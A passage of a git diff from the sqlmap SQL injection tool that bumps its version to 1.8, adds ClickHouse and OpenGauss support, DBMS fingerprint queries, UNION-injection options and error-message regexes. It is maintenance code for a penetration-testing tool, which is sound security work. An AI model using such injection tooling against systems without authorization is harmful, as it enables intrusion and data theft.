from lib.core.settings import VERTICA_ALIASES
from lib.core.settings import VIRTUOSO_ALIASES
+from lib.core.settings import CLICKHOUSE_ALIASES
FIREBIRD_TYPES = {
261: "BLOB",
@@ -241,6 +242,7 @@
DBMS.PRESTO: (PRESTO_ALIASES, "presto-python-client", "https://github.com/prestodb/presto-python-client", None),
DBMS.ALTIBASE: (ALTIBASE_ALIASES, None, None, None),
DBMS.MIMERSQL: (MIMERSQL_ALIASES, "mimerpy", "https://github.com/mimersql/MimerPy", None),
+ DBMS.CLICKHOUSE: (CLICKHOUSE_ALIASES, "clickhouse_connect", "https://github.com/ClickHouse/clickhouse-connect", None),
DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"),
DBMS.CUBRID: (CUBRID_ALIASES, "CUBRID-Python", "https://github.com/CUBRID/cubrid-python", None),
DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype", None),
@@ -268,7 +270,7 @@
DBMS.ACCESS: "CVAR(NULL)",
DBMS.MAXDB: "ALPHA(NULL)",
DBMS.MSSQL: "DIFFERENCE(NULL,NULL)",
- DBMS.MYSQL: "QUARTER(NULL)",
+ DBMS.MYSQL: "QUARTER(NULL XOR NULL)",
DBMS.ORACLE: "INSTR2(NULL,NULL)",
DBMS.PGSQL: "QUOTE_IDENT(NULL)",
DBMS.SQLITE: "UNLIKELY(NULL)",
@@ -286,6 +288,7 @@
DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))",
DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))",
DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)",
+ DBMS.CLICKHOUSE: "halfMD5(NULL) IS NULL",
}
SQL_STATEMENTS = {
diff --git a/lib/core/dump.py b/lib/core/dump.py
index 2e3cdfde635..42f713efd9d 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/enums.py b/lib/core/enums.py
index 188bd9fc3c9..54d4177b71d 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -52,6 +52,7 @@ class DBMS(object):
PRESTO = "Presto"
ALTIBASE = "Altibase"
MIMERSQL = "MimerSQL"
+ CLICKHOUSE = "ClickHouse"
CRATEDB = "CrateDB"
CUBRID = "Cubrid"
CACHE = "InterSystems Cache"
@@ -81,6 +82,7 @@ class DBMS_DIRECTORY_NAME(object):
PRESTO = "presto"
ALTIBASE = "altibase"
MIMERSQL = "mimersql"
+ CLICKHOUSE = "clickhouse"
CRATEDB = "cratedb"
CUBRID = "cubrid"
CACHE = "cache"
@@ -104,6 +106,7 @@ class FORK(object):
YELLOWBRICK = "Yellowbrick"
IRIS = "Iris"
YUGABYTEDB = "YugabyteDB"
+ OPENGAUSS = "OpenGauss"
class CUSTOM_LOGGING(object):
PAYLOAD = 9
diff --git a/lib/core/exception.py b/lib/core/exception.py
index 8e487ce30e9..f923705d912 100644
--- a/lib/core/exception.py
+++ b/lib/core/exception.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/gui.py b/lib/core/gui.py
index fa6f2694943..00f98ee75c4 100644
--- a/lib/core/gui.py
+++ b/lib/core/gui.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -223,7 +223,7 @@ def enqueue(stream, queue):
helpmenu.add_command(label="Wiki pages", command=lambda: webbrowser.open(WIKI_PAGE))
helpmenu.add_command(label="Report issue", command=lambda: webbrowser.open(ISSUES_PAGE))
helpmenu.add_separator()
- helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "Copyright (c) 2006-2023\n\n (%s)" % DEV_EMAIL_ADDRESS))
+ helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "Copyright (c) 2006-2024\n\n (%s)" % DEV_EMAIL_ADDRESS))
menubar.add_cascade(label="Help", menu=helpmenu)
window.config(menu=menubar)
diff --git a/lib/core/log.py b/lib/core/log.py
index 64e4f1b71dd..33e6a36b5f7 100644
--- a/lib/core/log.py
+++ b/lib/core/log.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/option.py b/lib/core/option.py
index 46583762048..55cf4371381 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -815,7 +815,7 @@ def _setTamperingFunctions():
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
for name, function in inspect.getmembers(module, inspect.isfunction):
- if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or hasattr(inspect, "getargspec") and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"):
+ if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"):
found = True
kb.tamperFunctions.append(function)
function.__name__ = module.__name__
@@ -929,7 +929,7 @@ def _setPreprocessFunctions():
else:
try:
function(_urllib.request.Request("http://localhost"))
- except:
+ except Exception as ex:
tbMsg = traceback.format_exc()
if conf.debug:
@@ -943,8 +943,8 @@ def _setPreprocessFunctions():
errMsg = "function 'preprocess(req)' "
errMsg += "in preprocess script '%s' " % script
- errMsg += "appears to be invalid "
- errMsg += "(Note: find template script at '%s')" % filename
+ errMsg += "had issues in a test run ('%s'). " % getSafeExString(ex)
+ errMsg += "You can find a template script at '%s'" % filename
raise SqlmapGenericException(errMsg)
def _setPostprocessFunctions():
@@ -1696,11 +1696,20 @@ def _cleanupOptions():
try:
conf.ignoreCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.ignoreCode)]
except ValueError:
- errMsg = "options '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD
+ errMsg = "option '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD
raise SqlmapSyntaxException(errMsg)
else:
conf.ignoreCode = []
+ if conf.abortCode:
+ try:
+ conf.abortCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.abortCode)]
+ except ValueError:
+ errMsg = "option '--abort-code' should contain a list of integer values"
+ raise SqlmapSyntaxException(errMsg)
+ else:
+ conf.abortCode = []
+
if conf.paramFilter:
conf.paramFilter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.paramFilter.upper())]
else:
@@ -1792,6 +1801,9 @@ def _cleanupOptions():
conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None
break
+ if conf.uValues:
+ conf.uCols = "%d-%d" % (1 + conf.uValues.count(','), 1 + conf.uValues.count(','))
+
if conf.testFilter:
conf.testFilter = conf.testFilter.strip('*+')
conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter)
@@ -2136,6 +2148,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.prependFlag = False
kb.processResponseCounter = 0
kb.previousMethod = None
+ kb.processNonCustom = None
kb.processUserMarks = None
kb.proxyAuthHeader = None
kb.queryCounter = 0
@@ -2158,6 +2171,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.smokeMode = False
kb.reduceTests = None
kb.sslSuccess = False
+ kb.startTime = time.time()
kb.stickyDBMS = False
kb.suppressResumeInfo = False
kb.tableFrom = None
@@ -2572,6 +2586,10 @@ def _basicOptionValidation():
errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
+ if conf.uValues and conf.uChar:
+ errMsg = "option '--union-values' is incompatible with option '--union-char'"
+ raise SqlmapSyntaxException(errMsg)
+
if conf.base64Parameter and conf.tamper:
errMsg = "option '--base64' is incompatible with option '--tamper'"
raise SqlmapSyntaxException(errMsg)
@@ -2655,6 +2673,9 @@ def _basicOptionValidation():
raise SqlmapSyntaxException(errMsg)
if conf.paramExclude:
+ if re.search(r"\A\w+,", conf.paramExclude):
+ conf.paramExclude = r"\A(%s)\Z" % ('|'.join(re.escape(_).strip() for _ in conf.paramExclude.split(',')))
+
try:
re.compile(conf.paramExclude)
except Exception as ex:
@@ -2791,6 +2812,11 @@ def _basicOptionValidation():
errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True))
raise SqlmapSyntaxException(errMsg)
+ if conf.uValues and (not re.search(r"\A['\w\s.,()%s-]+\Z" % CUSTOM_INJECTION_MARK_CHAR, conf.uValues) or conf.uValues.count(CUSTOM_INJECTION_MARK_CHAR) != 1):
+ errMsg = "option '--union-values' must contain valid UNION column values, along with the injection position "
+ errMsg += "(e.g. 'NULL,1,%s,NULL')" % CUSTOM_INJECTION_MARK_CHAR
+ raise SqlmapSyntaxException(errMsg)
+
if conf.skip and conf.testParameter:
if intersect(conf.skip, conf.testParameter):
errMsg = "option '--skip' is incompatible with option '-p'"
@@ -2817,10 +2843,6 @@ def _basicOptionValidation():
errMsg = "value for option '--time-sec' must be a positive integer"
raise SqlmapSyntaxException(errMsg)
- if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar):
- errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)"
- raise SqlmapSyntaxException(errMsg)
-
if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.wizard, conf.dependencies, conf.purge, conf.listTampers)):
errMsg = "option '--crack' should be used as a standalone"
raise SqlmapSyntaxException(errMsg)
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 48343a494ac..a404cccaaa1 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -39,6 +39,7 @@
"authType": "string",
"authCred": "string",
"authFile": "string",
+ "abortCode": "string",
"ignoreCode": "string",
"ignoreProxy": "boolean",
"ignoreRedirects": "boolean",
@@ -117,6 +118,7 @@
"uCols": "string",
"uChar": "string",
"uFrom": "string",
+ "uValues": "string",
"dnsDomain": "string",
"secondUrl": "string",
"secondReq": "string",
@@ -204,6 +206,7 @@
"General": {
"trafficFile": "string",
+ "abortOnEmpty": "boolean",
"answers": "string",
"batch": "boolean",
"base64Parameter": "string",
@@ -236,6 +239,7 @@
"skipWaf": "boolean",
"testFilter": "string",
"testSkip": "string",
+ "timeLimit": "float",
"webRoot": "string",
},
diff --git a/lib/core/patch.py b/lib/core/patch.py
index 18681432519..a5d821291ac 100644
--- a/lib/core/patch.py
+++ b/lib/core/patch.py
@@ -1,11 +1,13 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import codecs
+import collections
+import inspect
import os
import random
import re
@@ -93,6 +95,26 @@ def _(self, *args):
else:
os.urandom = lambda size: "".join(chr(random.randint(0, 255)) for _ in xrange(size))
+ # Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py
+ # Reference: https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec
+ if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"):
+ ArgSpec = collections.namedtuple("ArgSpec", ("args", "varargs", "keywords", "defaults"))
+
+ def makelist(data):
+ if isinstance(data, (tuple, list, set, dict)):
+ return list(data)
+ elif data:
+ return [data]
+ else:
+ return []
+
+ def getargspec(func):
+ spec = inspect.getfullargspec(func)
+ kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs)
+ return ArgSpec(kwargs, spec[1], spec[2], spec[3])
+
+ inspect.getargspec = getargspec
+
def resolveCrossReferences():
"""
Place for cross-reference resolution
diff --git a/lib/core/profiling.py b/lib/core/profiling.py
index 4fddab24a7e..6d3de015b52 100644
--- a/lib/core/profiling.py
+++ b/lib/core/profiling.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py
index 0a6c1dd5185..602ccafa108 100644
--- a/lib/core/readlineng.py
+++ b/lib/core/readlineng.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/replication.py b/lib/core/replication.py
index 236d1ed4463..c425568fb00 100644
--- a/lib/core/replication.py
+++ b/lib/core/replication.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/revision.py b/lib/core/revision.py
index 7abd30cd03e..b3e5a046aad 100644
--- a/lib/core/revision.py
+++ b/lib/core/revision.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/session.py b/lib/core/session.py
index c50d7b03e87..52b6ed6438f 100644
--- a/lib/core/session.py
+++ b/lib/core/session.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 3223a88e4ec..3241a120f8f 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -20,7 +20,7 @@
from thirdparty.six import unichr as _unichr
# sqlmap version (...)
-VERSION = "1.7"
+VERSION = "1.8"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -283,6 +283,7 @@
ALTIBASE_SYSTEM_DBS = ("SYSTEM_",)
MIMERSQL_SYSTEM_DBS = ("information_schema", "SYSTEM",)
CRATEDB_SYSTEM_DBS = ("information_schema", "pg_catalog", "sys")
+CLICKHOUSE_SYSTEM_DBS = ("information_schema", "INFORMATION_SCHEMA", "system")
CUBRID_SYSTEM_DBS = ("DBA",)
CACHE_SYSTEM_DBS = ("%Dictionary", "INFORMATION_SCHEMA", "%SYS")
EXTREMEDB_SYSTEM_DBS = ("",)
@@ -293,7 +294,7 @@
# Note: () + ()
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
MYSQL_ALIASES = ("mysql", "my") + ("mariadb", "maria", "memsql", "tidb", "percona", "drizzle")
-PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") + ("cockroach", "cockroachdb", "amazon redshift", "redshift", "greenplum", "yellowbrick", "enterprisedb", "yugabyte", "yugabytedb")
+PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") + ("cockroach", "cockroachdb", "amazon redshift", "redshift", "greenplum", "yellowbrick", "enterprisedb", "yugabyte", "yugabytedb", "opengauss")
ORACLE_ALIASES = ("oracle", "orcl", "ora", "or")
SQLITE_ALIASES = ("sqlite", "sqlite3")
ACCESS_ALIASES = ("microsoft access", "msaccess", "access", "jet")
@@ -313,6 +314,7 @@
MIMERSQL_ALIASES = ("mimersql", "mimer")
CRATEDB_ALIASES = ("cratedb", "crate")
CUBRID_ALIASES = ("cubrid",)
+CLICKHOUSE_ALIASES = ("clickhouse",)
CACHE_ALIASES = ("intersystems cache", "cachedb", "cache", "iris")
EXTREMEDB_ALIASES = ("extremedb", "extreme")
FRONTBASE_ALIASES = ("frontbase",)
@@ -321,10 +323,10 @@
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
-SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES)
+SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES)
SUPPORTED_OS = ("linux", "windows")
-DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES))
+DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES))
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
REFERER_ALIASES = ("ref", "referer", "referrer")
@@ -413,6 +415,7 @@
r"(?P[^\n>]{0,100}SQL Syntax[^\n<]+)",
r"(?s)Error Type:
(?P.+?)",
r"CDbCommand (?P[^<>\n]*SQL[^<>\n]+)",
+ r"Code: \d+. DB::Exception: (?P[^<>\n]*)",
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)",
r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)",
r"(?Pquery error: SELECT[^<>]+)"
@@ -428,7 +431,7 @@
JAVASCRIPT_HREF_REGEX = r'